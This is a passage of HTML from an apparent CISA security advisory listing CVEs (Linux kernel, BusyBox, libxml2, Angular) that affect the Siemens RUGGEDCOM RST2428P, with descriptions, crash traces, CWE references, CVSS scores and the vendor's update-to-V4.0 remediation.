<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40271</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix uaf in proc_readdir_de() Pde is erased from subdir rbtree through rb_erase(), but not set the node to EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE() set the erased node to EMPTY, then pde_subdir_next() will return NULL to avoid uaf access. We found an uaf issue while using stress-ng testing, need to run testcase getdent and tun in the same time. The steps of the issue is as follows: 1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current pde is tun3; 2) in the [time windows] unregister netdevice tun3 and tun2, and erase them from rbtree. erase tun3 first, and then erase tun2. the pde(tun2) will be released to slab; 3) continue to getdent process, then pde_subdir_next() will return pde(tun2) which is released, it will case uaf access. CPU 0 | CPU 1 ------------------------------------------------------------------------- traverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-&gt;dev) //tun3 tun2 sys_getdents64() | iterate_dir() | proc_readdir() | proc_readdir_de() | snmp6_unregister_dev() pde_get(de); | proc_remove() read_unlock(&amp;proc_subdir_lock); | remove_proc_subtree() | write_lock(&amp;proc_subdir_lock); [time window] | rb_erase(&amp;root-&gt;subdir_node, &amp;parent-&gt;subdir); | write_unlock(&amp;proc_subdir_lock); read_lock(&amp;proc_subdir_lock); | next = pde_subdir_next(de); | pde_put(de); | de = next; //UAF | rbtree of dev_snmp6 | pde(tun3) / \ NULL pde(tun2)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40271">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/625.html">CWE-625 Permissive Regular Expression</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40278</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak Fix a KMSAN kernel-infoleak detected by the syzbot . [net?] KMSAN: kernel-infoleak in __skb_datagram_iter In tcf_ife_dump(), the variable 'opt' was partially initialized using a designatied initializer. While the padding bytes are reamined uninitialized. nla_put() copies the entire structure into a netlink message, these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to beign copied. This change silences the KMSAN report and prevents potential information leaks from the kernel memory. This fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures no infoleak.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40278">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40280</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free in tipc_mon_reinit_self(). syzbot reported use-after-free of tipc_net(net)-&gt;monitors[] in tipc_mon_reinit_self(). [0] The array is protected by RTNL, but tipc_mon_reinit_self() iterates over it without RTNL. tipc_mon_reinit_self() is called from tipc_net_finalize(), which is always under RTNL except for tipc_net_finalize_work(). Let's hold RTNL in tipc_net_finalize_work(). [0]: BUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 Read of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989 CPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 Workqueue: events tipc_net_finalize_work Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568 kasan_check_byte include/linux/kasan.h:399 [inline] lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline] rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline] rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244 rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243 write_lock_bh include/linux/rwlock_rt.h:99 [inline] tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718 tipc_net_finalize+0x115/0x190 net/tipc/net.c:140 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 6089: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407 kmalloc_noprof include/linux/slab.h:905 [inline] kzalloc_noprof include/linux/slab.h:1039 [inline] tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657 tipc_enable_bearer net/tipc/bearer.c:357 [inline] __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047 __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline] tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393 tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline] tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321 genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:729 ____sys_sendmsg+0x508/0x820 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40280">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40281</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto syzbot reported a possible shift-out-of-bounds [1] Blamed commit added rto_alpha_max and rto_beta_max set to 1000. It is unclear if some sctp users are setting very large rto_alpha and/or rto_beta. In order to prevent user regression, perform the test at run time. Also add READ_ONCE() annotations as sysctl values can change under us. [1] UBSAN: shift-out-of-bounds in net/sctp/transport.c:509:41 shift exponent 64 is too large for 32-bit type 'unsigned int' CPU: 0 UID: 0 PID: 16704 Comm: syz.2.2320 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x16c/0x1f0 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:233 [inline] __ubsan_handle_shift_out_of_bounds+0x27f/0x420 lib/ubsan.c:494 sctp_transport_update_rto.cold+0x1c/0x34b net/sctp/transport.c:509 sctp_check_transmitted+0x11c4/0x1c30 net/sctp/outqueue.c:1502 sctp_outq_sack+0x4ef/0x1b20 net/sctp/outqueue.c:1338 sctp_cmd_process_sack net/sctp/sm_sideeffect.c:840 [inline] sctp_cmd_interpreter net/sctp/sm_sideeffect.c:1372 [inline]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40281">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1335.html">CWE-1335 Incorrect Bitwise Shift of Integer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40345</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: usb: storage: sddr55: Reject out-of-bound new_pba Discovered by Atuin - Automated Vulnerability Discovery Engine. new_pba comes from the status packet returned after each write. A bogus device could report values beyond the block count derived from info-&gt;capacity, letting the driver walk off the end of pba_to_lba[] and corrupt heap memory. Reject PBAs that exceed the computed block count and fail the transfer so we avoid touching out-of-range mapping entries.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40345">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.8</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46394</a></h3>
<div class="csaf-accordion-content">
<p>In tar in BusyBox through 1.37.0, a TAR archive can have filenames hidden from a listing through the use of terminal escape sequences.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46394">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/451.html">CWE-451 User Interface (UI) Misrepresentation of Critical Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.2</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49794</a></h3>
<div class="csaf-accordion-content">
<p>A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49794">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49795</a></h3>
<div class="csaf-accordion-content">
<p>A NULL pointer dereference vulnerability was found in libxml2 when processing XPath XML expressions. This flaw allows an attacker to craft a malicious XML input to libxml2, leading to a denial of service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49795">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49796</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49796">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-60876</a></h3>
<div class="csaf-accordion-content">
<p>BusyBox wget thru 1.3.7 accepted raw CR (0x0D)/LF (0x0A) and other C0 control bytes in the HTTP request-target (path/query), allowing the request line to be split and attacker-controlled headers to be injected. To preserve the HTTP/1.1 request-line shape METHOD SP request-target SP HTTP/1.1, a raw space (0x20) in the request-target must also be rejected (clients should use %20).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-60876">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/284.html">CWE-284 Improper Access Control</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66035</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is a XSRF token leakage via protocol-relative URLs in angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with protocol-relative URL (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding using protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66035">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/201.html">CWE-201 Insertion of Sensitive Information Into Sent Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66382</a></h3>
